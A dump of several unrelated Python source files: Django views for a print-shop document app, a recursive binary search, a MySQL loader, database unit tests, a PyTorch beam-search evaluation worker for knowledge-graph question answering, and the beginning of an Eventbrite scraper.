        new_doc = data.save(commit=False)
        new_doc.organization = org
        new_doc.is_public = True
        new_doc.save()
        # Persist the many-to-many tags now that the document has a pk.
        data.save_m2m()
        if(user.userType == 1 ):
            return HttpResponseRedirect(reverse('documentListOwner'))
        elif(user.userType == 2):
            return HttpResponseRedirect(reverse('documentListEmp'))
    else:
        form = DocUploadForm()
        if(user.userType == 1 ):
            context = { "docUploadForm" : form}
            return render(request,'printo_app/docUpload-owner.html',context)
        if(user.userType == 2 ):
            shopRate = Shop.objects.get(employee=request.user).rate
            context = { "docUploadForm" : form,"rate":shopRate }
            return render(request,'printo_app/docUpload-emp.html',context)
@login_required
def docList(request):
    """Show the caller's organization's public documents (owner or employee
    view); other user types implicitly fall through (returns None)."""
    profile = UserProfile.objects.get(user=request.user)
    if profile.userType == 1:
        organization = Organization.objects.get(owner=request.user)
        docs = Document.objects.filter(is_public=True).filter(organization=organization)
        return render(request, 'printo_app/docList-owner.html', {"docs": docs})
    elif profile.userType == 2:
        organization = Organization.objects.get(employee=request.user)
        docs = Document.objects.filter(is_public=True).filter(organization=organization).order_by('-uploadedDate')
        return render(request, 'printo_app/docList-emp.html', {"docs": docs})
@login_required
def docListOwner(request):
    """Owner-only public document list.

    NOTE(review): a later parameter-identical `docListOwner` stub near the
    bottom of this module shadows this definition, so URL routing resolves
    to the stub (which returns None) — remove one of the two.
    """
    user = UserProfile.objects.get(user=request.user)
    if(user.userType == 1 ):
        org = Organization.objects.get(owner = request.user)
        docList = Document.objects.filter(is_public=True).filter(organization=org)
        context = {"docs":docList}
        return render(request,'printo_app/docList-owner.html',context)
@login_required
def docDetail(request, docid):
    """Render one document along with an edit form pre-bound to it."""
    document = Document.objects.get(id=docid)
    edit_form = DocUploadForm(instance=document)
    return render(request, 'printo_app/docDetail.html',
                  {"docEditForm": edit_form, "doc": document})
@login_required
def docEditSave(request, docid):
    """Apply POSTed edits to document `docid`, then return to the list.

    NOTE(review): is_valid() is never consulted (invalid data raises instead
    of re-rendering) and `context` is built but unused.
    """
    currentDoc = Document.objects.get(id=docid)
    docDetail = DocUploadForm(request.POST,request.FILES,instance=currentDoc)
    docDetail.save()
    context = { "msg":docDetail }
    return HttpResponseRedirect(reverse('documentList'))
@login_required
def shopProfile(request, shopid=None):
    """Show the shop profile page.

    NOTE(review): the owner branch (userType == 1) is a no-op, so owners get
    the template with an empty context; only employees see their shop's
    details and an edit form. `shopid` is accepted but unused.
    """
    context = {}
    user = UserProfile.objects.get(user=request.user)
    if(user.userType == 1):
        pass
    elif(user.userType == 2):
        shop = Shop.objects.get(employee=request.user)
        shopForm = ShopEditForm()
        context = {'shopForm':shopForm,'details':shop}
    return render(request,'printo_app/shopProfile.html',context)
@login_required
def shopEditSave(request):
    """Persist POSTed edits to the requesting employee's shop, then return
    to the shop profile page."""
    current_shop = Shop.objects.get(employee=request.user)
    ShopEditForm(request.POST, instance=current_shop).save()
    return HttpResponseRedirect(reverse('shopProfile'))
@login_required
def indexEmp(request, shopid=None):
    """Redirect straight to the order list.

    NOTE(review): `is_owner` and `context` are computed but never used, and
    this definition shadows the earlier `indexEmp` above — dead code on
    both counts.
    """
    user = UserProfile.objects.get(user=request.user)
    is_owner = False
    if(user.userType == 1):
        is_owner = True
    elif(user.userType == 2):
        is_owner = False
    context = {'is_owner':is_owner}
    return HttpResponseRedirect(reverse('orderList'))
@login_required
def orderList(request, shopid=None):
    """Show the employee's shop orders plus per-status counts
    (new / pending / completed / delivered)."""
    shop = Shop.objects.get(employee=request.user)
    orders = Order.objects.filter(shop=shop)
    context = {
        "orders": orders,
        "new_count": orders.filter(is_new=True).count(),
        "pending_count": orders.filter(is_accepted=True).count(),
        "completed_count": orders.filter(is_printed=True).count(),
        "delivered_count": orders.filter(is_delivered=True).count(),
    }
    return render(request, 'printo_app/ordersList.html', context)
@login_required
def shopList(request):
    """List every shop that belongs to the requesting owner's organization."""
    organization = Organization.objects.get(owner=request.user)
    owned_shops = Shop.objects.filter(owner=organization)
    return render(request, 'printo_app/shopList.html', {'shops': owned_shops})
@login_required
def shopCreate(request):
    """Create a shop plus the employee User account that will manage it.

    Only owners (userType == 1) may create shops. On a valid POST, creates
    the employee User + UserProfile, then the Shop linked to the owner's
    Organization, and redirects to the shop list.

    Fixed: removed a leftover `import ipdb; ipdb.set_trace()` debugger
    breakpoint that froze every POST to this view.
    NOTE(review): an invalid POST falls through and returns None (a Django
    error) instead of re-rendering the form with errors — confirm and fix.
    """
    uprofile = get_object_or_404(UserProfile, user=request.user)
    if uprofile.userType==1:
        pass
    else:
        return HttpResponse("You don't have permission")
    if(request.method=='POST'):
        form = ShopForm(request.POST)
        if(form.is_valid()):
            username = form.cleaned_data.get("username", None)
            password = form.cleaned_data.get("password", None)
            telephone = form.cleaned_data.get("telephone", None)
            # The shop's contact email mirrors the owner's account email.
            email = request.user.email
            # email = form.cleaned_data.get("email", None)
            # if email == None:
            #     email = request.user.email
            if username != None:
                user = User.objects.create_user(username=username,email=email, password=password)
                userprofile = UserProfile()
                userprofile.user = user
                userprofile.userType = 2
                if telephone !=None:
                    userprofile.telephone = telephone
                userprofile.save()
                shopprofile = Shop()
                shopprofile.employee = user
                shopprofile.owner = Organization.objects.get(owner = request.user)
                shopprofile.email = email
                shopprofile.shopName = form.cleaned_data.get("shopName", None)
                shopprofile.pincode = form.cleaned_data.get("pincode",None)
                shopprofile.address = form.cleaned_data.get("address",None)
                shopprofile.latitude = form.cleaned_data.get("latitude",None)
                shopprofile.longitude = form.cleaned_data.get("longitude",None)
                shopprofile.telephone = form.cleaned_data.get("telephone",None)
                shopprofile.save()
                # M2M assignment must happen after the Shop row exists.
                shopprofile.services = form.cleaned_data.get("services",None)
            return HttpResponseRedirect(reverse('shopList'))
    else:
        userform = 'this form is to be deleted'
        shopform = ShopForm()
        context = { 'shopCreateForm' : shopform, 'userForm' : userform }
        return render(request,'printo_app/shopCreate.html',context)
@login_required
def index(request):
    """Route the user to the owner or employee landing page according to
    their profile type; any other type yields None."""
    profile = UserProfile.objects.get(user=request.user)
    landing_by_type = {1: 'OwnerMain', 2: 'EmployeeMain'}
    target = landing_by_type.get(profile.userType)
    if target is not None:
        return HttpResponseRedirect(reverse(target))
    return None
class RegistrationForm(forms.Form):
    """Owner sign-up form; the email address doubles as the username."""
    email = forms.EmailField(widget=forms.TextInput(attrs={'class': 'mandatory', 'placeholder': 'Email'}),
        label=_(u'email address'))
    password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'mandatory', 'placeholder': 'Password'}, render_value=False),
        label=_(u'Password'))
    password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'mandatory', 'placeholder': ' Password Again'}, render_value=False),
        label=_(u'Password Again'))
    mobile = forms.CharField(max_length=14)
    def clean(self):
        """
        Verify that the values entered into the two password fields
        match. Note that an error here will end up in
        ``non_field_errors()`` because it doesn't apply to a single
        field.
        """
        if 'password1' in self.cleaned_data and 'password' in self.cleaned_data:
            if self.cleaned_data['password1'] != self.cleaned_data['password']:
                raise forms.ValidationError(_(u'You must type the same password each time'))
        return self.cleaned_data
    def clean_email(self):
        # The email is stored as the username, hence the username lookup.
        if 'email' in self.cleaned_data:
            try:
                user = User.objects.get(username= self.cleaned_data["email"])
                raise forms.ValidationError(_(u'Already Email Address is registered'))
            except User.DoesNotExist:
                pass
        return self.cleaned_data["email"]
def index_main(request):
    """Public landing page: redirect authenticated users to "main", otherwise
    show / process the owner registration form.

    NOTE(review): `request.user.is_authenticated()` as a call is pre-Django-1.10
    style; on modern Django it is a property.
    """
    if request.user.is_authenticated()==True:
        return HttpResponseRedirect(reverse("main"))
    else:
        if request.method=="POST":
            form= RegistrationForm(request.POST)
            if form.is_valid():
                # Email doubles as the username (see RegistrationForm.clean_email).
                u = User.objects.create_user(form.cleaned_data["email"], form.cleaned_data["email"], form.cleaned_data["password"],)
                # Send a mail with verification code
                profile = UserProfile()
                profile.user =u
                profile.userType =1
                profile.mobile = form.cleaned_data["mobile"]
                profile.save()
                # Every new owner gets a fresh Organization.
                org= Organization()
                org.owner = u
                org.save()
                return HttpResponse("Thanks")
        else:
            form =RegistrationForm()
        return render( request, 'index_main.html', context={"form":form},)
def docListOwner(request):
    # NOTE(review): this stub shadows the working @login_required docListOwner
    # defined earlier in this module, so the name now resolves to a view that
    # returns None — almost certainly should be removed.
    pass
def docUploadOwner(request):
    # TODO(review): unimplemented placeholder; returns None, which is not a
    # valid Django response.
    pass
@login_required
def indexOwner(request):
    """Owner landing page (no dynamic context)."""
    return render(request, 'ownerMain.html', {})
# ====================================
# DATA PROVIDERS
# ====================================
import json
from django.core import serializers
def get_universitys(request):
    """JSON map of university name -> (name, pk)."""
    payload = {u.name: (u.name, u.pk) for u in University.objects.all()}
    return HttpResponse(json.dumps(payload), content_type="application/json")
def get_publishers(request):
    """JSON map of publisher name -> (name, pk)."""
    payload = {p.name: (p.name, p.pk) for p in Publisher.objects.all()}
    return HttpResponse(json.dumps(payload), content_type="application/json")
def get_courses(request):
    """JSON map of course name -> (name, pk)."""
    payload = {course.name: (course.name, course.pk) for course in Course.objects.all()}
    return HttpResponse(json.dumps(payload), content_type="application/json")
def get_topics(request):
    """JSON map of topic name -> (name, pk)."""
    payload = {t.name: (t.name, t.pk) for t in Topic.objects.all()}
    return HttpResponse(json.dumps(payload), content_type="application/json")
def get_tags(request):
    """JSON map of tag name -> (name, id)."""
    payload = {t.name: (t.name, t.id) for t in Tag.objects.all()}
    return HttpResponse(json.dumps(payload), content_type="application/json")
def get_services(request):
    """JSON map of service name -> (name, id)."""
    payload = {s.name: (s.name, s.id) for s in Service.objects.all()}
    return HttpResponse(json.dumps(payload), content_type="application/json")
def get_colleges(request):
    """Return every College as JSON: {name: (latitude, longitude)} as strings."""
    payload = {col.name: (str(col.latitude), str(col.longitude)) for col in College.objects.all()}
    return HttpResponse(json.dumps(payload), content_type="application/json")
def get_cities(request):
    """Return every City as JSON: {name: (latitude, longitude)} as strings."""
    payload = {city.name: (str(city.latitude), str(city.longitude)) for city in City.objects.all()}
    return HttpResponse(json.dumps(payload), content_type="application/json")
|
9,209 | 7171edc3eecd2f0cdebd914e89a7a7e0353ddf63 | '''code for recursuve binary search '''
def rbinarysearch(l, k, begin, end):
    """Recursive binary search over the sorted list `l` within [begin, end].

    Returns 1 if `k` is present in that inclusive range, else 0.

    The original handled begin==end, end-begin==1, end-begin>1 and
    end-begin<0 as four separate cases; the single `begin > end` base case
    below subsumes all of them.
    """
    if begin > end:
        # Empty range (also covers an initially-inverted range): not found.
        return 0
    mid = (begin + end) // 2
    if l[mid] == k:
        return 1
    if l[mid] > k:
        return rbinarysearch(l, k, begin, mid - 1)
    return rbinarysearch(l, k, mid + 1, end)


print(rbinarysearch([1, 2, 3, 4, 5], -1, 0, 4))
|
9,210 | 291052c22059b32f3f300c323a10b260fbd0c20f | import mysql.connector
import json
mysql_user = 'root'
mysql_pass = 'funwfats'
mysql_host = 'localhost'
mysql_base = 'sys'
wn8_file = "wn8exp.json"
def fill_wn8_table():
    """Load per-tank expected WN8 statistics from `wn8_file` into `wn8exp`.

    For each tank: one INSERT of its id, then one UPDATE per statistic.

    Fixes vs. the original:
      * statistic values are bound as query parameters instead of being
        concatenated into the SQL string;
      * the cursor and connection are closed even when a statement fails.
    """
    with open(wn8_file, encoding="utf-8") as file:
        wn8_dict = json.loads(file.read())
    cnx_wn8 = mysql.connector.connect(user=mysql_user, password=mysql_pass,
                                      host=mysql_host, database=mysql_base)
    try:
        cursor_wn8 = cnx_wn8.cursor()
        try:
            for tank in wn8_dict['data']:
                tid = tank['IDNum']
                cursor_wn8.execute("INSERT INTO wn8exp (id) VALUES (%s)", (tid,))
                for stat, value in tank.items():
                    if stat == 'IDNum':
                        continue
                    # A column name cannot be a bound parameter; `stat` comes
                    # from the local wn8exp JSON file, not from user input.
                    cursor_wn8.execute(
                        "UPDATE wn8exp SET {} = %s WHERE id = %s".format(stat),
                        (str(value), tid))
            cnx_wn8.commit()
        finally:
            cursor_wn8.close()
    finally:
        cnx_wn8.close()


if __name__ == '__main__':
    fill_wn8_table()
|
9,211 | ff8e8af72a8eb97a392fcfec5960eed7a2e51f68 | # Reference: https://docs.python.org/2/library/unittest.html
import unittest
import sys
sys.path.append('..')
from database_utils import DatabaseUtils
class Test_DatabaseUtils(unittest.TestCase):
    """Integration tests for DatabaseUtils.

    These require a reachable LMS database with its seed data (book id 1,
    author 'gavin', a title containing 'Harry', etc.); the expected
    True/False results below encode that fixture state.
    """

    def setUp(self):
        # A fresh DatabaseUtils (and DB connection) for every test.
        self.db = DatabaseUtils()

    def dataCount(self):
        """Helper (not a test): return the row count of LmsUser."""
        with self.db.connection.cursor() as cursor:
            cursor.execute("select count(*) from LmsUser")
            return cursor.fetchone()[0]

    def test_getUser(self):
        # NOTE(review): the bare `except:` swallows every error and only
        # prints, so this test can never actually fail; consider asserting
        # on the result (or using self.fail) instead.
        count = self.dataCount()
        try:
            trueResult = self.db.getUser("username")
            print("Test passed")
        except:
            print("Test failed")

    def test_insertBookTransaction(self):
        # (book_id, user_id, borrow_date, event_id) — expected to succeed.
        testData = (1, 1, "2019-01-01", "abc")
        result = self.db.insertBookTransaction(testData[0], testData[1], testData[2], testData[3])
        print("result: ", result)
        self.assertTrue(result)

    def test_updateBookStatus(self):
        # Invalid status string — update expected to fail.
        testData = (1, "anything")
        result = self.db.updateBookStatus(testData[1], testData[0])
        self.assertFalse(result)

    def test_updateBookTransaction(self):
        # Invalid event id — update expected to fail.
        testData = (1, "anything", "2019-01-01")
        result = self.db.updateBookTransaction(testData[0], testData[1], testData[2])
        self.assertFalse(result)

    def test_searchBooks(self):
        # No title matches "abc"; "Harry" is expected to exist in the fixture.
        result = self.db.searchBooks("abc")
        self.assertFalse(result)
        result = self.db.searchBooks("Harry")
        self.assertTrue(result)

    def test_searchBooksAuthur(self):
        # No author "abc"; author "gavin" expected in the fixture.
        result = self.db.searchBooksAuthur("abc")
        self.assertFalse(result)
        result = self.db.searchBooksAuthur("gavin")
        self.assertTrue(result)

    def test_searchBooksISBN(self):
        # ISBN 1 is not expected to exist.
        result = self.db.searchBooksISBN(1)
        self.assertFalse(result)

    def test_listBooks(self):
        result = self.db.listBooks()
        self.assertTrue(result)

    def test_getBook(self):
        result = self.db.getBook(1)
        self.assertTrue(result)

    def test_getBookISBN(self):
        result = self.db.getBookISBN(1)
        self.assertFalse(result)

    def test_listReturnBooks(self):
        result = self.db.listReturnBooks(1)
        self.assertTrue(result)

    def test_getReturnBook(self):
        result = self.db.getReturnBook(1, 1)
        self.assertTrue(result)


if __name__ == "__main__":
    unittest.main()
9,212 | c7333d838b87d4c275d9dbb6d7e3047c313b4bc0 | import torch
import torch.nn as nn
from tqdm import tqdm
import torch.nn.functional as F
import torch.multiprocessing as mp
from policy_network import Policy_Network
from util import safe_log
from util import index2word, rearrange_vector_list, get_num_gpus, set_seed
class TestWorker(mp.Process):
    """Evaluation worker process for a KGQA policy.

    Each worker loads a Policy_Network checkpoint onto its assigned GPU,
    runs beam search over its environment's dataset for `max_hop` steps per
    question, and writes the resulting hits@1 score into the shared
    `d_results` dict.
    """

    def __init__(self, args, worker_id, env, d_entity_neighours, d_entity2bucketid, d_action_space_buckets, d_entity2id, d_relation2id, reqa_checkpoint_path, d_results, word_num, entity_num, relation_num, keqa_checkpoint_path, return_trace = False):
        super().__init__(name='test-worker-%02d' % (worker_id))
        self.args = args
        # Distinct seed per worker so workers don't mirror each other.
        self.seed = args.seed + worker_id
        self.fix_batch_size = args.batch_size
        self.use_keqa_vector = args.use_keqa_vector
        self.max_hop = args.max_hop
        self.beam_size = args.beam_size
        # When True, rollout prints the full search trace (debugging aid).
        self.return_trace = return_trace
        self.d_entity_neighours = d_entity_neighours
        self.d_entity2bucketid = d_entity2bucketid
        self.d_action_space_buckets = d_action_space_buckets
        # Reverse dictionaries (id -> symbol) for trace printing.
        self.id2entity = index2word(d_entity2id)
        self.id2relation = index2word(d_relation2id)
        self.worker_id = worker_id
        # Round-robin GPU assignment across workers.
        self.gpu_id = self.worker_id % get_num_gpus()
        self.env = env
        self.d_results = d_results
        self.reqa_checkpoint_path = reqa_checkpoint_path
        self.word_num = word_num
        self.entity_num = entity_num
        self.relation_num = relation_num
        self.keqa_checkpoint_path = keqa_checkpoint_path

    def run(self):
        """Process entry point: build/load the model, evaluate, report hits@1."""
        set_seed(self.seed)
        # The model is constructed here (inside the child process), not in
        # __init__, so CUDA state is not shared across fork boundaries.
        self.model = Policy_Network(self.args, self.word_num, self.entity_num, self.relation_num, self.keqa_checkpoint_path, self.gpu_id)
        self.model.load(self.reqa_checkpoint_path)
        self.model.cuda(self.gpu_id)
        self.model.eval()
        self.env.set_model(self.model)
        self.env.set_gpu_id(self.gpu_id)
        total_data_num = len(self.env.d_dataset)
        hits_1_num = 0
        with torch.no_grad():
            for example_id in tqdm(range(0, len(self.env.d_dataset), self.fix_batch_size), desc=self.name, position=self.worker_id):
                idx = range(example_id, example_id + self.fix_batch_size)
                self.env.reset(idx)
                # The final batch may be smaller than fix_batch_size.
                self.batch_size = self.env.batch_size
                batch_hits1 = self.rollout()
                hits_1_num += batch_hits1
        hits_1_result = 1.0 * hits_1_num / total_data_num
        self.d_results['hits@1'] = hits_1_result

    def rollout(self):
        """Beam-search one batch for max_hop steps; return the hits@1 count."""
        batch_question, batch_question_len, batch_head, batch_answers = self.env.return_batch_data()
        if self.return_trace:
            l_search_trace = []
            l_log_action_probs = []
        batch_pred_vector = None
        if self.use_keqa_vector:
            # KEQA "anticipated entity" vector used as extra guidance.
            batch_pred_vector = self.model.get_anticipated_entity_vector(batch_head, batch_question, batch_question_len, self.d_entity_neighours)
        log_action_prob = torch.zeros(self.batch_size).cuda(self.gpu_id)
        for t in range(self.max_hop):
            path_trace, path_hidden = self.env.observe()
            last_r, e_t = path_trace[-1]
            # Last layer's hidden state of the path encoder.
            batch_path_hidden = path_hidden[-1][0][-1, :, :]
            # k = current beam width (rows per batch example).
            k = int(e_t.size()[0] / self.batch_size)
            # Tile per-example tensors across the beam dimension.
            beam_question = batch_question.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1)
            beam_question_len = batch_question_len.unsqueeze(1).repeat(1, k).view(self.batch_size * k)
            beam_pred_vector = None
            if self.use_keqa_vector:
                beam_pred_vector = batch_pred_vector.unsqueeze(1).repeat(1, k, 1).view(self.batch_size * k, -1)
            db_outcomes, _, _, inv_offset = self.model.transit(t, e_t, beam_question, beam_question_len, batch_path_hidden, self.d_entity2bucketid, self.d_action_space_buckets, last_r, False, beam_pred_vector)
            db_action_spaces = [action_space for action_space, _ in db_outcomes]
            db_action_dist = [action_dist for _, action_dist in db_outcomes]
            # Merge per-bucket outputs back into original row order.
            action_space = self.pad_and_cat_action_space(db_action_spaces, inv_offset)
            action_dist = self.pad_and_cat(db_action_dist, padding_value=0)[inv_offset]
            # Accumulated path log-probability + this step's action log-probs.
            log_action_dist = log_action_prob.view(-1, 1) + safe_log(action_dist)
            if self.return_trace:
                print(t)
                print(last_r, e_t)
                print("----")
                print(action_space[0])
                print(F.softmax(log_action_dist.view(-1)).view(self.batch_size * k, -1))
                print("------------------------")
            if t == self.max_hop - 1:
                # Final hop: deduplicate candidate answer entities.
                action, log_action_prob, action_offset = self.top_k_answer_unique(log_action_dist, action_space)
            else:
                action, log_action_prob, action_offset = self.top_k_action(log_action_dist, action_space)
            path_list, (h_t, c_t) = self.model.update_path(action, path_hidden, offset = action_offset)
            self.env.step(action, path_list, (h_t, c_t))
            if self.return_trace:
                # Keep the stored traces aligned with the surviving beams.
                rearrange_vector_list(l_log_action_probs, action_offset)
                l_log_action_probs.append(log_action_prob)
                self.adjust_search_trace(l_search_trace, action_offset)
                l_search_trace.append(action)
        # Top-1 predicted answer entity per example.
        batch_pred_e2 = action[1].view(self.batch_size, -1)
        batch_pred_e2_top1 = batch_pred_e2[:, 0].view(self.batch_size, -1)
        # batch_answers is assumed to be a 0/1 indicator matrix over entities
        # (gathering at the prediction yields 1 iff correct) — TODO confirm.
        batch_hits1 = torch.sum(torch.gather(batch_answers, 1, batch_pred_e2_top1).view(-1)).item()
        if self.return_trace:
            self.print_search_trace(batch_head, l_search_trace, l_log_action_probs)
        return batch_hits1

    def top_k_action(self, log_action_dist, action_space):
        """Select the top-k (relation, entity) actions per batch example.

        Returns the chosen actions, their log-probabilities, and offsets
        mapping each survivor back to its row in the previous beam.
        """
        full_size = len(log_action_dist)
        last_k = int(full_size / self.batch_size)
        (r_space, e_space), _ = action_space
        action_space_size = r_space.size()[1]
        # Flatten (beam x action) into one candidate axis per example.
        log_action_dist = log_action_dist.view(self.batch_size, -1)
        beam_action_space_size = log_action_dist.size()[1]
        k = min(self.beam_size, beam_action_space_size)
        log_action_prob, action_ind = torch.topk(log_action_dist, k)
        next_r = torch.gather(r_space.view(self.batch_size, -1), 1, action_ind).view(-1)
        next_e = torch.gather(e_space.view(self.batch_size, -1), 1, action_ind).view(-1)
        log_action_prob = log_action_prob.view(-1)
        # Which previous-beam row each selected action came from.
        action_beam_offset = action_ind // action_space_size
        action_batch_offset = (torch.arange(self.batch_size).cuda(self.gpu_id) * last_k).unsqueeze(1)
        action_offset = (action_batch_offset + action_beam_offset).view(-1)
        return (next_r, next_e), log_action_prob, action_offset

    def top_k_answer_unique(self, log_action_dist, action_space):
        """Like top_k_action, but for the final hop: deduplicate entities so
        each candidate answer appears once, keeping its best-scoring path."""
        full_size = len(log_action_dist)
        last_k = int(full_size / self.batch_size)
        (r_space, e_space), _ = action_space
        action_space_size = r_space.size()[1]
        r_space = r_space.view(self.batch_size, -1)
        e_space = e_space.view(self.batch_size, -1)
        log_action_dist = log_action_dist.view(self.batch_size, -1)
        beam_action_space_size = log_action_dist.size()[1]
        k = min(self.beam_size, beam_action_space_size)
        next_r_list, next_e_list = [], []
        log_action_prob_list = []
        action_offset_list = []
        for i in range(self.batch_size):
            log_action_dist_b = log_action_dist[i]
            r_space_b = r_space[i]
            e_space_b = e_space[i]
            # torch.unique is done on CPU, then moved back to this worker's GPU.
            unique_e_space_b = torch.unique(e_space_b.data.cpu()).cuda(self.gpu_id)
            unique_log_action_dist, unique_idx = self.unique_max(unique_e_space_b, e_space_b, log_action_dist_b)
            # Fewer unique entities than k is possible.
            k_prime = min(len(unique_e_space_b), k)
            top_unique_log_action_dist, top_unique_idx2 = torch.topk(unique_log_action_dist, k_prime)
            top_unique_idx = unique_idx[top_unique_idx2]
            top_unique_beam_offset = top_unique_idx // action_space_size
            top_r = r_space_b[top_unique_idx]
            top_e = e_space_b[top_unique_idx]
            next_r_list.append(top_r.unsqueeze(0))
            next_e_list.append(top_e.unsqueeze(0))
            log_action_prob_list.append(top_unique_log_action_dist.unsqueeze(0))
            top_unique_batch_offset = i * last_k
            top_unique_action_offset = top_unique_batch_offset + top_unique_beam_offset
            action_offset_list.append(top_unique_action_offset.unsqueeze(0))
        # Rows can have different k_prime; pad to a rectangle before concat.
        next_r = self.pad_and_cat(next_r_list, padding_value=0).view(-1)
        next_e = self.pad_and_cat(next_e_list, padding_value=0).view(-1)
        log_action_prob = self.pad_and_cat(log_action_prob_list, padding_value = -float("inf"))
        action_offset = self.pad_and_cat(action_offset_list, padding_value=-1)
        return (next_r, next_e), log_action_prob.view(-1), action_offset.view(-1)

    def sync_model(self):
        # NOTE(review): self.shared_model is never assigned anywhere in this
        # class, so calling sync_model() would raise AttributeError —
        # presumably a leftover from a training worker; confirm before use.
        self.model.load_state_dict(self.shared_model.state_dict())

    def pad_and_cat_action_space(self, action_spaces, inv_offset):
        """Pad per-bucket action spaces to equal width, concatenate them, and
        restore the original row order via inv_offset."""
        db_r_space, db_e_space, db_action_mask = [], [], []
        for (r_space, e_space), action_mask in action_spaces:
            db_r_space.append(r_space)
            db_e_space.append(e_space)
            db_action_mask.append(action_mask)
        r_space = self.pad_and_cat(db_r_space, padding_value=0)[inv_offset]
        e_space = self.pad_and_cat(db_e_space, padding_value=0)[inv_offset]
        action_mask = self.pad_and_cat(db_action_mask, padding_value=0)[inv_offset]
        action_space = ((r_space, e_space), action_mask)
        return action_space

    def pad_and_cat(self, a, padding_value, padding_dim=1):
        """Right-pad every tensor in `a` along padding_dim to the maximum
        width, then concatenate along dim 0 on this worker's GPU."""
        max_dim_size = max([x.size()[padding_dim] for x in a])
        padded_a = []
        for x in a:
            if x.size()[padding_dim] < max_dim_size:
                res_len = max_dim_size - x.size()[1]
                pad = nn.ConstantPad1d((0, res_len), padding_value)
                padded_a.append(pad(x))
            else:
                padded_a.append(x)
        return torch.cat(padded_a, dim=0).cuda(self.gpu_id)

    def unique_max(self, unique_x, x, values, marker_2D=None):
        """For each entry of unique_x, return the max of `values` over its
        occurrences in `x`, plus the argmax index into `x`.

        Processed in chunks of `unique_interval` rows to bound the size of
        the |unique| x |x| marker matrix. The marker_2D parameter is
        overwritten immediately and is effectively unused.
        """
        unique_interval = 100
        # Large sentinel used to mask out non-matching positions.
        HUGE_INT = 1e31
        unique_values, unique_indices = [], []
        for i in range(0, len(unique_x), unique_interval):
            unique_x_b = unique_x[i:i+unique_interval]
            marker_2D = (unique_x_b.unsqueeze(1) == x.unsqueeze(0)).float()
            values_2D = marker_2D * values.unsqueeze(0) - (1 - marker_2D) * HUGE_INT
            unique_values_b, unique_idx_b = values_2D.max(dim=1)
            unique_values.append(unique_values_b)
            unique_indices.append(unique_idx_b)
        unique_values = torch.cat(unique_values).cuda(self.gpu_id)
        unique_idx = torch.cat(unique_indices).cuda(self.gpu_id)
        return unique_values, unique_idx

    def adjust_search_trace(self, search_trace, action_offset):
        """Reindex every stored (r, e) step so traces follow surviving beams."""
        for i, (r, e) in enumerate(search_trace):
            new_r = r[action_offset]
            new_e = e[action_offset]
            search_trace[i] = (new_r, new_e)

    def print_search_trace(self, batch_head, l_search_trace, l_log_action_probs):
        """Pretty-print each example's beam paths as edge-label strings."""
        for i in range(self.batch_size):
            top_k_edge_labels = []
            for k, log_action_prob in enumerate(l_log_action_probs):
                beam_size = len(log_action_prob)
                for j in range(beam_size):
                    ind = i * beam_size + j
                    r = self.id2relation[int(l_search_trace[k][0][ind])]
                    e = self.id2entity[int(l_search_trace[k][1][ind])]
                    # '_inverse' relations are rendered as reversed arrows.
                    if r.endswith('_inverse'):
                        edge_label = '<-{}-{} {}'.format(r[:-8], e, float(log_action_prob[ind]))
                    else:
                        edge_label = '-{}->{} {}'.format(r, e, float(log_action_prob[ind]))
                    if k == 0:
                        # First hop: prefix the path with the head entity.
                        edge_label = self.id2entity[int(batch_head[i])] + edge_label
                        top_k_edge_labels.append(edge_label)
                    else:
                        top_k_edge_labels[j] += edge_label
            # NOTE(review): this loop variable shadows the outer `i`.
            for i, edge_label in enumerate(top_k_edge_labels):
                print(i, edge_label)
            print("*****************************")
|
9,213 | edfc8794fab2c95e01ae254f9f13d446faafe6fd | from datetime import datetime
import logging
import os
import re
from bs4 import BeautifulSoup
import requests
from .utils.log import get_logger
logger = get_logger(os.path.basename(__file__))
EVENTBRITE_TOKEN = os.environ['EVENTBRITE_TOKEN']
def get_category_name(page):
    """Return the event's category label for the import row.

    '' when the event has no category; the bare category name when it has no
    subcategory; otherwise 'Category,Subcategory'. Embedded commas are
    stripped from both names because the result itself is comma-delimited.
    """
    if page["category_id"] is None:
        category = ''
    else:
        if page["subcategory_id"] is None:
            category = get(page["category_id"], 'categories/').json()["name"]
        else:
            category_name = get(page["category_id"], 'categories/')
            category_name = category_name.json()["name"]
            category_name = category_name.replace(",", "")
            subcategory_name = get(page["subcategory_id"], 'subcategories/')
            subcategory_name = subcategory_name.json()["name"]
            subcategory_name = subcategory_name.replace(",", "")
            category = category_name + "," + subcategory_name
    return category
def scrape(event_id, event_cost):
    """Fetch one event (and its venue) from the Eventbrite API and map it
    into the calendar-import row format."""
    page = get(event_id, resource='events').json()
    venue = get(page["venue_id"], resource='venues').json()
    # 'local' timestamps are in the venue's timezone, e.g. '2019-06-01T18:00:00'.
    start = datetime.strptime(page['start']['local'], '%Y-%m-%dT%H:%M:%S')
    end = datetime.strptime(page['end']['local'], '%Y-%m-%dT%H:%M:%S')
    # Prefix the summary with the venue's state/region, e.g. '(MD) ...'.
    desc = "(" + venue["address"]["region"] + ") " + page["summary"]
    event_data = {
        'Event Name': page['name']['text'],
        'Event Description': desc,
        'Event Start Date': start.strftime('%Y-%m-%d'),
        'Event Start Time': start.strftime('%H:%M:%S'),
        'Event End Date': end.strftime('%Y-%m-%d'),
        'Event End Time': end.strftime('%H:%M:%S'),
        'All Day Event': "False",
        'Timezone': "America/New_York",
        'Event Venue Name': venue["name"],
        'Event Organizers': 'Sierra Club MD',
        'Event Cost': event_cost,
        'Event Currency Symbol': "$",
        # TODO: parse event data for optional category fields if present
        'Event Category': get_category_name(page),
        'Event Website': page['url'],
        'Event Featured Image': ""
    }
    return event_data
def get(api_id, resource, params=None):
    """GET an Eventbrite resource and return the Response (None on error).

    resource == 'o' fetches the public organizer page (no token); any other
    value hits the v3 API with the token query parameter.

    Fix: `params` previously defaulted to a shared mutable dict
    ({'token': EVENTBRITE_TOKEN}) built once at import time — the classic
    mutable-default-argument pitfall; it is now constructed per call.
    """
    if params is None:
        params = {'token': EVENTBRITE_TOKEN}
    url = f'https://www.eventbrite.com/o/{api_id}' if resource == 'o' \
        else f'https://www.eventbriteapi.com/v3/{resource}/{api_id}'
    try:
        if resource != 'o':
            r = requests.get(url, params=params)
        else:
            r = requests.get(url)
    except Exception as e:
        msg = f"Exception making GET request to {url}: {e}"
        logger.critical(msg, exc_info=True)
        return None  # callers must handle a failed request
    if not r.ok:
        # Non-2xx is logged but the response is still returned to the caller.
        code = r.status_code
